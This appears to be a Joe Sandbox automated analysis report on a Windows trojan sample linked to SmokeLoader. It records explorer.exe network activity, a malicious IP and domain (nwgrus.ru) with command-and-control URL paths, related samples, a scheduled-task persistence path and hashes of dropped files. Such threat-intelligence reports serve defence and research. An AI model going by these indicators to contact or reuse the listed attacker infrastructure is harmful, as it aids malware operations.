                            https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.000000000482E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1777648899.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.msn.com:443/v1/news/Feed/Windows?Vexplorer.exe, 0000000B.00000002.2961877649.0000000004AE8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                              https://api.msn.com/explorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://outlook.com_explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1775499027.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2632404157.00000000047A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2628998635.00000000047A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      109.175.29.39
                                      nwgrus.ruBosnia and Herzegowina
                                      9146BIHNETBIHNETAutonomusSystemBAtrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1533009
                                      Start date and time:2024-10-14 10:01:16 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 45s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:24
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:3sfCdeA1H2.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:91be25f31b7891908a50dfdc9f03f2b4.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@4/9@4/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 38
                                      • Number of non-executed functions: 13
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, mobsync.exe
                                      • Excluded IPs from analysis (whitelisted): 204.79.197.203, 184.28.90.27, 2.23.209.168, 2.23.209.179, 2.23.209.175, 2.23.209.167, 2.23.209.173, 2.23.209.171, 2.23.209.176, 2.23.209.178, 2.23.209.177, 2.23.209.150, 2.23.209.142, 2.23.209.149, 2.23.209.140, 2.23.209.143, 2.23.209.144, 2.23.209.153, 2.23.209.141, 2.23.209.135
                                      • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, r.bing.com.edgekey.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, p-static.bing.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, r.bing.com, prod.fs.microsoft.com.akadns.net, api-msn-com.a-0003.a-msedge.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      TimeTypeDescription
                                      04:02:36API Interceptor4894x Sleep call for process: explorer.exe modified
                                      09:02:36Task SchedulerRun new task: Firefox Default Browser Agent 9520CF1C77ACE06B path: C:\Users\user\AppData\Roaming\tttcvva
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      109.175.29.39FyDBXJE74v.exeGet hashmaliciousSmokeLoaderBrowse
                                      • nwgrus.ru/tmp/index.php
                                      bCnarg2O62.exeGet hashmaliciousSmokeLoaderBrowse
                                      • nwgrus.ru/tmp/index.php
                                      veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                      • nwgrus.ru/tmp/index.php
                                      Cjmw6m68OV.exeGet hashmaliciousSmokeLoaderBrowse
                                      • nwgrus.ru/tmp/index.php
                                      82HD7ZgYPA.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                      • 100xmargin.com/tmp/index.php
                                      HliN0ju7OT.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                      • yosoborno.com/tmp/
                                      file.exeGet hashmaliciousBabuk, DjvuBrowse
                                      • cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
                                      file.exeGet hashmaliciousBabuk, DjvuBrowse
                                      • cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                                      xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                      • dbfhns.in/tmp/index.php
                                      file.exeGet hashmaliciousBabuk, Djvu, PrivateLoaderBrowse
                                      • cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      nwgrus.rufile.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 125.7.253.10
                                      1HGXcC63iu.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 189.161.95.103
                                      K80v6DHFHE.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 148.230.249.9
                                      FyDBXJE74v.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 78.89.199.216
                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 63.143.98.185
                                      fTKQwp8fRa.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 78.89.199.216
                                      LgigaSKsL6.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 190.224.203.37
                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 190.147.128.172
                                      mGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 119.204.11.2
                                      uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 190.224.203.37
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      BIHNETBIHNETAutonomusSystemBAFyDBXJE74v.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 109.175.29.39
                                      PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 92.36.226.66
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 92.36.229.146
                                      bCnarg2O62.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 109.175.29.39
                                      UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 185.12.79.25
                                      veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 109.175.29.39
                                      http://iss.fmpvs.gov.ba/Home/ChangeCulture?lang=hr&returnUrl=https://aaqkada0nzi2n2jhlthmzditndjinc1hz.hanskiin7.com/782340117681873687911955xbixgen-pgx-783419043035-ifxyeonkim-isxskyline-holt.comsf-1sf_rand()Get hashmaliciousHTMLPhisherBrowse
                                      • 109.175.10.156
                                      Cjmw6m68OV.exeGet hashmaliciousSmokeLoaderBrowse
                                      • 109.175.29.39
                                      O9M84hUenb.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 92.36.229.158
                                      h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                                      • 92.36.226.66
                                      No context
                                      No context
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.3033525586087413
                                      Encrypted:false
                                      SSDEEP:384:EyC1L+7yzjAWMo+hiRichk8zuiFRY4lO8k:Ey8+7yzj0o4QBhk8zuiFRY4lO8
                                      MD5:528C33206235BF0975BB80AE0AA1681E
                                      SHA1:C97FFC62E26E31CFF3B68369370203120B3F78C3
                                      SHA-256:839869FF49D5332955AC503D4A24C42530CC1D329AE7FB0E4918F5CD07573E95
                                      SHA-512:576AD5C28A0B8344223A4E8B8249F47927D1B3DED9D3665B37D777F1A670588FFEEA5D09D615D417280DEAD276E0529695D1854D8D6BCF01CA56A51FFE1E9C34
                                      Malicious:false
                                      Reputation:low
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.6.6.6.2.0.7.2.9.1.2.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.b.0.2.9.8.1.-.0.a.5.1.-.4.5.7.e.-.a.8.6.5.-.9.a.4.3.d.b.5.b.7.1.1.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.9.1.2.d.7.2.-.9.e.d.f.-.4.0.8.9.-.9.0.5.e.-.d.6.2.2.a.f.8.2.d.0.7.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.1.4.-.0.0.0.1.-.0.0.1.4.-.2.e.0.b.-.b.f.d.4.0.2.1.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Mini DuMP crash report, 17 streams, CheckSum 0x00000004, Mon Oct 14 08:03:41 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):1037438
                                      Entropy (8bit):1.3824087536722143
                                      Encrypted:false
                                      SSDEEP:1536:U2wcgwElAsQU/h3iQCaYbwTrrtqrHSjZXhe0jsrr09AA0z:U2wcgpasQU5lYbwHIrHSNRyss
                                      MD5:2E5D06104DC17C0DC2DAED64D6EFC010
                                      SHA1:D39481A33C7D8A1B4AA850222466B1CCA563FC9B
                                      SHA-256:48E9C226198F00EEB3C95D18878B23D309978866E4A81F70EA5D4E380C44FBDE
                                      SHA-512:908C0B64A51A67DD0672E800085F95DFA20F3E90DBD087AA3CF1CB8DEB222B33D1D4E8B0E71DBA41BB49C4E475C264BC2A3DF4F1FA322018568A1DC53BCFB8C3
                                      Malicious:false
                                      Reputation:low
                                      Preview:MDMP..a..... .......]..g................ ........m..............d...........h.......D...N...........x.......8...........T...$.......pX...|..........,.......................................................................................................eJ.............Lw......................T..............g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):10850
                                      Entropy (8bit):3.6981518541042036
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJdfUc6YX8TIgmfqzVoprq89bsytimPPFfPEm:R6lXJlUc6YsTIgmfqzVGsoimPPFf5
                                      MD5:433516E8E46D655F49161C493281F13E
                                      SHA1:1020BF0C3038A25534B2060776D03100E2F77E27
                                      SHA-256:EBE8BB0D63D4DA1635EEEF0B4251016CF39571F1D840F6A5ADD7539FF37C0C68
                                      SHA-512:385C005504DFF7DE74DFCE39FB9413C57B0A177DE63C93F5C3FFA1378267E7C587B3DB659D209A4B3C1906E8AD48DF76C4B87A534CB6E1ECDCF20E1418E77A61
                                      Malicious:false
                                      Reputation:low
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.8.0.<./.P.i.
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4724
                                      Entropy (8bit):4.462573756837234
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zs5Jg771I9mRWpW8VYeYm8M4JYmFcxiyq85cZb9Q3jd:uIjfLI7ZA7VGJ04Dba3jd
                                      MD5:20276AD4AF30732E28E826EA939807C3
                                      SHA1:35F839B1C266DA90C8012D63184DDCF44983B5BC
                                      SHA-256:4C9F216C81A2170A8A1B6B784A238809CBB65ECAE10FE24A13A26B188BC0021A
                                      SHA-512:D0C183F55A1DEF9CFFABDE29EDECF689F4B8A7C350710717890A6A0C78CEB6E1C1861C5BBCF41EA08E6B265F00E40ABAA6D6469F9E61F97EF66EDAEE2730788D
                                      Malicious:false
                                      Reputation:low
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542826" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\explorer.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):108216
                                      Entropy (8bit):4.005657858968619
                                      Encrypted:false
                                      SSDEEP:768:h7F9oInjxkCGxzOPajk0+ACWHpfnzbNyLYduJxP7pxoZsR1v9nvnFOOmdypfR3YU:fdkVzTrJvzgxhGiwGGnS5mFwiKui9l+a
                                      MD5:6D2F6F99D48B83155842E1CEC3F994C8
                                      SHA1:964230E8E72EA4C61AD95584B51A4BF7CC410FE6
                                      SHA-256:06F09810929E97A0ED27294670A0671A9CABD5E8E3B2BC10B938DA10D7804E08
                                      SHA-512:C564FFB74CE3D4A2BD8E16003D9538DF6C5DB59EE98737C51D33912A3DBDDE5A239727619D2CD88B720B39A2D1533845C571B3354BF6156926B55B88994296F5
                                      Malicious:false
                                      Reputation:low
                                      Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                      Process:C:\Windows\explorer.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):108216
                                      Entropy (8bit):4.006497453778269
                                      Encrypted:false
                                      SSDEEP:768:JaF9oZnjxk5GCzOPajk0+ACWHpfnz3N9LYduJxP7pxoZsR1v9sa8FOOmdypfR3YV:DdkzzTrJvz0YhGiwGGnn6mFkiKSiDl+a
                                      MD5:C7924E891E0A9CF96CE20C115FD235D5
                                      SHA1:F17E697C1F605224D8AF18E82A79F90A56580998
                                      SHA-256:B2848EFB802A716D521EF52B431EE2942978E60E012399CF5A9E9AA1F13D37AB
                                      SHA-512:B0D0E01C63181909D044EE1A07FAC32066E45E396B6434F95852E885D4F2ABF8BDD247BFD895C1071B7F17E02D79482A10A973CA5060AA57460665F5F1030E60
                                      Malicious:false
                                      Reputation:low
                                      Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                      Process:C:\Windows\explorer.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):750
                                      Entropy (8bit):5.170609118186295
                                      Encrypted:false
                                      SSDEEP:12:YWgc2XCYAH+a+r8LsmwUaH+2yrZMAdrKC8K/y8kEhq1HLxycXNNZ/TCB893c3Z:Yzc2oH2rUaHt0drc6hE14
                                      MD5:1A171512171521F2562921DD1C63E2A3
                                      SHA1:EE912010557ACEF76F944EE54B3B8AB02803CBAB
                                      SHA-256:B1400CC813D647D477607836A4AA62D384914AF364530FFEF09F0A3ED512DFA7
                                      SHA-512:BC5A65A19203D7257F439D699F2562EB0AEA429C34D5A8613B762DC179AF0FEF499BADB1035C1AF75B04FF98FB092F988E18E904492F1538BC3D7E275B2C505B
                                      Malicious:false
                                      Reputation:low
                                      Preview:{"serviceContext":{"serviceActivityId":"29c80c61-4416-4fb4-bd37-c231f69ad7c8","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"29c80c61-4416-4fb4-bd37-c231f69ad7c8|2024-10-14T08:03:47.5855618Z|fabric_msn|EUS2-A|News_439"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false},"isPartial":false}
                                      Process:C:\Windows\explorer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):265728
                                      Entropy (8bit):5.865289236213907
                                      Encrypted:false
                                      SSDEEP:3072:7jbcVSAwzdpaK6AQcrI+t5wCyxF9Davc5oUCIqzpjAqMi:PbcgeKJ8/4c5oVIqzpjAqh
                                      MD5:91BE25F31B7891908A50DFDC9F03F2B4
                                      SHA1:91DB4BC09A4976DB1B9922E09F2330B48AE50338
                                      SHA-256:422D2CEA49B00FDC8B97B75B623006386426EC23637C53341E03D250E5FFE21B
                                      SHA-512:39F10CDAD12C1857378DBB262C2D124450F03DE19109F5012472D14CDBA2C1B609D16A33F136BE3175699B6747F96F4053E34072B21E4F1C8E30035B4A02E1B9
                                      Malicious:true
